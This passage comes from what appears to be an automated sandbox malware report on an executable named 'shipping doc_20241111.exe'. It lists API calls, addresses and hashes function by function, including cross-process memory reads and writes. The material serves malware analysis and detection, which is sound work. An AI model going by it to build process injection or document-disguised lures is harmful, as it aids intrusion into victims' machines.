QueryPerformanceCounter.KERNEL32(?), ref: 00FAE8B5
QueryPerformanceFrequency.KERNEL32(?), ref: 00FAE8C3
Sleep.KERNEL32(00000000), ref: 00FAE8CB
QueryPerformanceCounter.KERNEL32(?), ref: 00FAE8D5
Sleep.KERNEL32 ref: 00FAE911

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f44419a10aa2e1fca1b1cc4735bfc1db3a262af7149e3ca9166fc74de1aaabcc
Instruction ID: 960515a432c635537c662ec47261d84088002258869fe5f0dc20df2fe17715d7
Opcode Fuzzy Hash: f44419a10aa2e1fca1b1cc4735bfc1db3a262af7149e3ca9166fc74de1aaabcc
Instruction Fuzzy Hash: 69012971D0162EEBCF40AFB5DC58AEEBB79BF0E711F010456E501B2281CB349654EBA1

Function 00FA103D Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA1058
GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1064
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1073
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA107A
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA1091

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: d8baf6ffedc25342910c7c837d7ee9fd7b4ac59316894155c6978cb8019091e7
Instruction ID: a89b9b8e629e70cef58e08679831c5bdd19c249028d87cb5c963480bdde724b6
Opcode Fuzzy Hash: d8baf6ffedc25342910c7c837d7ee9fd7b4ac59316894155c6978cb8019091e7
Instruction Fuzzy Hash: C1016DB950131ABFDB114F75DC48D6A3B7EFF85360B114415F945C7250DA31DC40EAA0

Function 00FA0EF8 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FA0F0E
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FA0F1A
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FA0F29
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FA0F30
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FA0F46

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 22ebede1ce16bf04353ec714f8672e1777742f07aa66782d601194e528eab5c6
Instruction ID: af8272bf138cd8f9c862cf5fd658a4b3f74d96d593bb05c88e61b5bc15dbb400
Opcode Fuzzy Hash: 22ebede1ce16bf04353ec714f8672e1777742f07aa66782d601194e528eab5c6
Instruction Fuzzy Hash: 40F0A97520131AAFDB210FB5AC4DF563BAEEF8A760F100412FA49D6291CA31DC40EAA0

Function 00FA0F58 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FA0F6E
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F7A
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F89
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F90
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0FA6

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3fbf84c3af7d89cf4bcf9ac5b9370de346d81d910b72a41e9afcd05f0c0a84dc
Instruction ID: 2f1f0e57fa560f051e945341e5c293472d9267566ceba19e35fdd17a6b08e90f
Opcode Fuzzy Hash: 3fbf84c3af7d89cf4bcf9ac5b9370de346d81d910b72a41e9afcd05f0c0a84dc
Instruction Fuzzy Hash: C5F0AF7510131AAFD7210FB5EC48F563B6EEF8A760F110411F945D6290CA30D840DAA0

Function 00FB022D Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB0242
CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB024F
CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB025C
CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB0269
CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB0276
CloseHandle.KERNEL32(?,?,?,?,00FB009B,?,00FB321A,?,00000001,00F8311E,?), ref: 00FB0283

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7a437d8e86b8aa2429ff5bf48c240744486cbfbbad8668e0b67e1be33e32b2a0
Instruction ID: 8358f4d173cdc224689ac236952fc8bc084ae3a498b5eab230fd968608b703d6
Opcode Fuzzy Hash: 7a437d8e86b8aa2429ff5bf48c240744486cbfbbad8668e0b67e1be33e32b2a0
Instruction Fuzzy Hash: 41019071801B159FCB319F66D880457F7F5BE502253158A3ED19651931C7B0A948EE80

Function 00F7D6DA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F7D6F2

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

_free.LIBCMT ref: 00F7D704
_free.LIBCMT ref: 00F7D716
_free.LIBCMT ref: 00F7D728
_free.LIBCMT ref: 00F7D73A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3df97013ac958a90ca94d00e7057cdcb89a7dfc85f485e77421180d99aec68d0
Instruction ID: 7f2135f746ad4e5503f3c115dc0fbee5dce34fa02d86bf5d9aa25ec03468e109
Opcode Fuzzy Hash: 3df97013ac958a90ca94d00e7057cdcb89a7dfc85f485e77421180d99aec68d0
Instruction Fuzzy Hash: 1CF04432A00249678665EB55E9C9C16B3FDBF44720F98884BF04CE7545C729FC826755

Function 00FA5B9A Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00FA5BAE
GetWindowTextW.USER32(00000000,?,00000100), ref: 00FA5BC5
MessageBeep.USER32(00000000), ref: 00FA5BDD
KillTimer.USER32(?,0000040A), ref: 00FA5BF9
EndDialog.USER32(?,00000001), ref: 00FA5C13

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 9a0c87ba54f74a0ac8641ae84b86a9c58c0a1c52c45d2c9a88f1443101aab30c
Instruction ID: 2f9e88d1601860ec7c8395902e8aed3d7e3d0633506281bb325df3a10ff7036e
Opcode Fuzzy Hash: 9a0c87ba54f74a0ac8641ae84b86a9c58c0a1c52c45d2c9a88f1443101aab30c
Instruction Fuzzy Hash: 3101D671500709ABEB205B20DD4EF9677B9BF01F46F04065AA582600E1DBF4E984EB90

Function 00F72230 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00F7224E

Part of subcall function 00F72958: RtlFreeHeap.NTDLL(00000000,00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000), ref: 00F7296E
Part of subcall function 00F72958: GetLastError.KERNEL32(00000000,?,00F7D771,00000000,00000000,00000000,00000000,?,00F7D798,00000000,00000007,00000000,?,00F7DB95,00000000,00000000), ref: 00F72980

_free.LIBCMT ref: 00F72260
_free.LIBCMT ref: 00F72273
_free.LIBCMT ref: 00F72284
_free.LIBCMT ref: 00F72295

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ea27bf90855e990073986c1defddbce57abb6b002a0cb32aa452d5854eaf988e
Instruction ID: 89c53bdcb629a80d68d4c3abcee107b0453cba71c7022c215421f42a2a150753
Opcode Fuzzy Hash: ea27bf90855e990073986c1defddbce57abb6b002a0cb32aa452d5854eaf988e
Instruction Fuzzy Hash: 8BF030B09011118B9666AF65E8028487774B718761F05824BF6D8D22ADC73E0593BB86

Function 00F5AA4B Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00F5AA5A
StrokeAndFillPath.GDI32(?,?,00F97BB4,00000000,?,?,?), ref: 00F5AA76
SelectObject.GDI32(?,00000000), ref: 00F5AA89
DeleteObject.GDI32 ref: 00F5AA9C
StrokePath.GDI32(?), ref: 00F5AAB7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 27f6ecfde111feb6ea99ab741072c8275a8bd4ee546481a83ffb2d7ad45a371a
Instruction ID: 1c8dd73a763cb2d7ee25010dab02b082db2348d3fe89f3f368821f79343d0514
Opcode Fuzzy Hash: 27f6ecfde111feb6ea99ab741072c8275a8bd4ee546481a83ffb2d7ad45a371a
Instruction Fuzzy Hash: 21F0CD31406249DBDB299F74EE0C7653B66AB00322F048315FBA5550F5C73D45A5EF61

Function 00F70ED7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00F71089
__freea.LIBCMT ref: 00F710A7

Part of subcall function 00F714C7: _free.LIBCMT ref: 00F714DF

Strings

a/p, xrefs: 00F7116E
am/pm, xrefs: 00F7110A

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 36d456c040da6c40173ea7071b81d7d9d1df99b2ad3a631e36692890bde6b9d7
Instruction ID: 844ae276fa66b96bed4631ea86db612b5f9173edabcc3c0844c1b4f09927455e
Opcode Fuzzy Hash: 36d456c040da6c40173ea7071b81d7d9d1df99b2ad3a631e36692890bde6b9d7
Instruction Fuzzy Hash: DDD10232D00206DADB249F6CC845BFAB7B5FF05320F24815BE909AB651D3759D88EB92

Function 00F44DF1 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F45033

Strings

A, xrefs: 00F44F5E
3, xrefs: 00F4505F
_, xrefs: 00F44F2E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: 3$A$_
API String ID: 176396367-1956071190
Opcode ID: 8bf9ca23e5ba9e241642091a7cf6a7e7843cd97f85ee11711a3fa0f93ee1a126
Instruction ID: 9de8dec9e00119d55d2c6c45c5591da3689bb08553ddb15eff9871a62113b3a2
Opcode Fuzzy Hash: 8bf9ca23e5ba9e241642091a7cf6a7e7843cd97f85ee11711a3fa0f93ee1a126
Instruction Fuzzy Hash: BB812636E002069BCF24AF58C8807BDBBA1BF54B30F24451AEC91EB2D1D7749E85B790

Function 00FA265A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FAB321: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA2114,?,?,00000034,00000800,?,00000034), ref: 00FAB34B

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00FA26A4

Part of subcall function 00FAB2EC: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00FA2143,?,?,00000800,?,00001073,00000000,?,?), ref: 00FAB316

Part of subcall function 00FAB248: GetWindowThreadProcessId.USER32(?,?), ref: 00FAB273
Part of subcall function 00FAB248: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00FA20D8,00000034,?,?,00001004,00000000,00000000), ref: 00FAB283
Part of subcall function 00FAB248: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00FA20D8,00000034,?,?,00001004,00000000,00000000), ref: 00FAB299

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA2711
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00FA275E

Strings

@, xrefs: 00FA2776

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 309f6edb42bb7b55b6e95dfb390e890e8d3e952aabc22555f0e753050fc31fe0
Instruction ID: 16b38d466c1a9dafd3770dea305c7a1e6c759af8044894c5db2f1e02415ad06a
Opcode Fuzzy Hash: 309f6edb42bb7b55b6e95dfb390e890e8d3e952aabc22555f0e753050fc31fe0
Instruction Fuzzy Hash: 19414EB6A00218AFDB11DFA4CD85AEEBBB8EF0A310F004055FA45B7181DB74AF44DB60

Function 00F716BE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\shipping doc_20241111.exe,00000104), ref: 00F716F9
_free.LIBCMT ref: 00F717C4
_free.LIBCMT ref: 00F717CE

Strings

C:\Users\user\Desktop\shipping doc_20241111.exe, xrefs: 00F716F0, 00F716F7, 00F71726, 00F7175E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\shipping doc_20241111.exe
API String ID: 2506810119-1283059036
Opcode ID: 2e39bcf041527da032f43972162b164773aa046cadd3a943cbf5ab22db6f6dd0
Instruction ID: bac49ddf9eaaf95168267a5c7366bd1943300549e5a2d3cf32d9fe95c2fdd662
Opcode Fuzzy Hash: 2e39bcf041527da032f43972162b164773aa046cadd3a943cbf5ab22db6f6dd0
Instruction Fuzzy Hash: 36318175E00218ABDB25DF9DDC85D9EBBFCFB84320F148167E54897200D6748A4AEB91

Function 00FAC19B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FAC224
DeleteMenu.USER32(?,00000007,00000000), ref: 00FAC26A
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01011990,01245670), ref: 00FAC2B3

Strings

0, xrefs: 00FAC1FD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: b3bccb49a81875c1cee5b31dfc29ac0f4682ab200f8cc9d98dc00d2009dd5239
Instruction ID: 826355f6039fa52af73d0e98be2cf7af8dfa877896b857c63abfd99a603b8278
Opcode Fuzzy Hash: b3bccb49a81875c1cee5b31dfc29ac0f4682ab200f8cc9d98dc00d2009dd5239
Instruction Fuzzy Hash: E84103B1604302DFD720DF64DC40B5ABBE8EF8A324F14462EF86197291C734E900DBA6

Function 00FD434B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00FDD0D0,00000000,?,?,?,?), ref: 00FD43DF
GetWindowLongW.USER32 ref: 00FD43FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FD440C

Strings

SysTreeView32, xrefs: 00FD43B1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 712b58afc21ad21b919ffaa97a297c3b2305ba3b040e38f796bd69843438e32e
Instruction ID: 53f37f8a85ab04e54bb91ceba032d79b2e5bb0ed13fae52b93f200b8022744a1
Opcode Fuzzy Hash: 712b58afc21ad21b919ffaa97a297c3b2305ba3b040e38f796bd69843438e32e
Instruction Fuzzy Hash: F2318131500209ABDB119E38DC45BEA7BAAEB09334F284726F979D22D0C774E854AB50

Function 00FC2F75 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3282: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00FC2F9E,?,?), ref: 00FC329F

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FC2FA1
_wcslen.LIBCMT ref: 00FC2FC2
htons.WSOCK32(00000000,?,?,00000000), ref: 00FC302D

Strings

255.255.255.255, xrefs: 00FC2FBC, 00FC2FC1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 5081002e53344c44730159b6b93d308dd993d3aa828d8c2c3e92742f9f985e32
Instruction ID: e2f33ff5cacbc2133d33b7be151abdedc01bac73227b4d8f73c7512c6802ac08
Opcode Fuzzy Hash: 5081002e53344c44730159b6b93d308dd993d3aa828d8c2c3e92742f9f985e32
Instruction Fuzzy Hash: B231A336A002069FC710CF68C686F697BE0EF54368F25C05DE8168B392D776DE41E760

Function 00FD3DEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00FD3E73
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00FD3E87
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FD3EAB

Strings

SysMonthCal32, xrefs: 00FD3E3E

Memory Dump Source

